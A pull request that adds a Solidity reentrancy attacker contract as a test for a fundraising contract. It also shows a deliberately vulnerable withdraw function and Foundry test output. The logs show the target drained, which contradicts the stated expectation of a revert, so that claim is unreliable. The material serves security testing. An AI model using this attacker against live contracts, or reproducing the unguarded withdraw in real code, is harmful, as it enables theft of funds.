### PR TITLE
Reentrancy test

### DIFF
--- a/src/Reentrancy.sol
+++ b/src/Reentrancy.sol
@@ -1,0 +1,41 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.19;
+
+contract IFundraise {
+    function contribute() public payable {}
+
+    function userWithdraw(uint256) public {}
+}
+
+contract Reentrancy {
+
+    IFundraise public immutable target;
+
+    constructor(address _target) {
+        target = IFundraise(_target);
+    }
+
+    function getTarget() public view returns(address) {
+        return address(target);
+    }
+
+    function getTargetBalance() public view returns(uint256) {
+        return address(target).balance;
+    }
+
+    function getAttackerBalance() external view returns(uint256) {
+        return address(this).balance;
+    }
+
+    function attack() public payable {
+        require(msg.value == 0.3 ether, "Require 0.3 Ether to attack");
+        target.contribute{value: 0.3 ether}();
+        target.userWithdraw(0.01 ether);
+    }
+
+    receive() external payable {
+        if(this.getTargetBalance() > 1 ether) {
+            target.userWithdraw(0.01 ether);
+        }
+    }
+}


### PR DESCRIPTION
**Previous versions are not vulnerable to re-entrancy!** This just simply adds a test case of reentrancy.

Added test case to ensure reentrancy attack is not possible on user withdraw. Because we have `nonReentrant()` modifier on `userWithdraw(uint256)`, we expect a revert. 

If we did not have that modifier and other checks then we can successfully reentrancy attack the contract. Here's what a vulnerable version might look like:

```solidty
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.19;

contract Fundraise {
  
    // ....

    function userWithdraw(uint256 _amt) public { //nonReentrant() {
        // uint256 contributedAmount = contributions[msg.sender];

        // require(_amt <= contributedAmount, 
        //     "Out of bounds withdrawal"
        // );

        // // Can only withdraw if softcap not met
        // require(fundraiseSoftCapWei > totalRaised, 
        //     "soft-cap reached, cannot withdraw"
        // );

        // uint256 newAmt = contributedAmount - _amt;

        // contributions[msg.sender] = newAmt;
        // totalRaised -= _amt;

        (bool success, ) = address(msg.sender).call{ value: _amt }("");
        require(success, "cannot withdraw");

        // emit Contributed(msg.sender, false, _amt, newAmt);
    }
}
```

```bash
$ forge test --match-test "testReentrancyAttack" -vvv
[⠒] Compiling...
[⠒] Compiling 2 files with 0.8.21
[⠢] Solc 0.8.21 finished in 853.07ms
Compiler run successful!

Running 1 test for test/Fundraise.t.sol:FundraiseTest
[PASS] testReentrancyAttackReverts() (gas: 3688927)
Logs:
  Fundraiser Contract balance before: 5000000000000000000
  Fundraiser Contract balance after: 1000000000000000000
  Attacker Contract balance after: 4300000000000000000

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 17.22ms
 
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)
```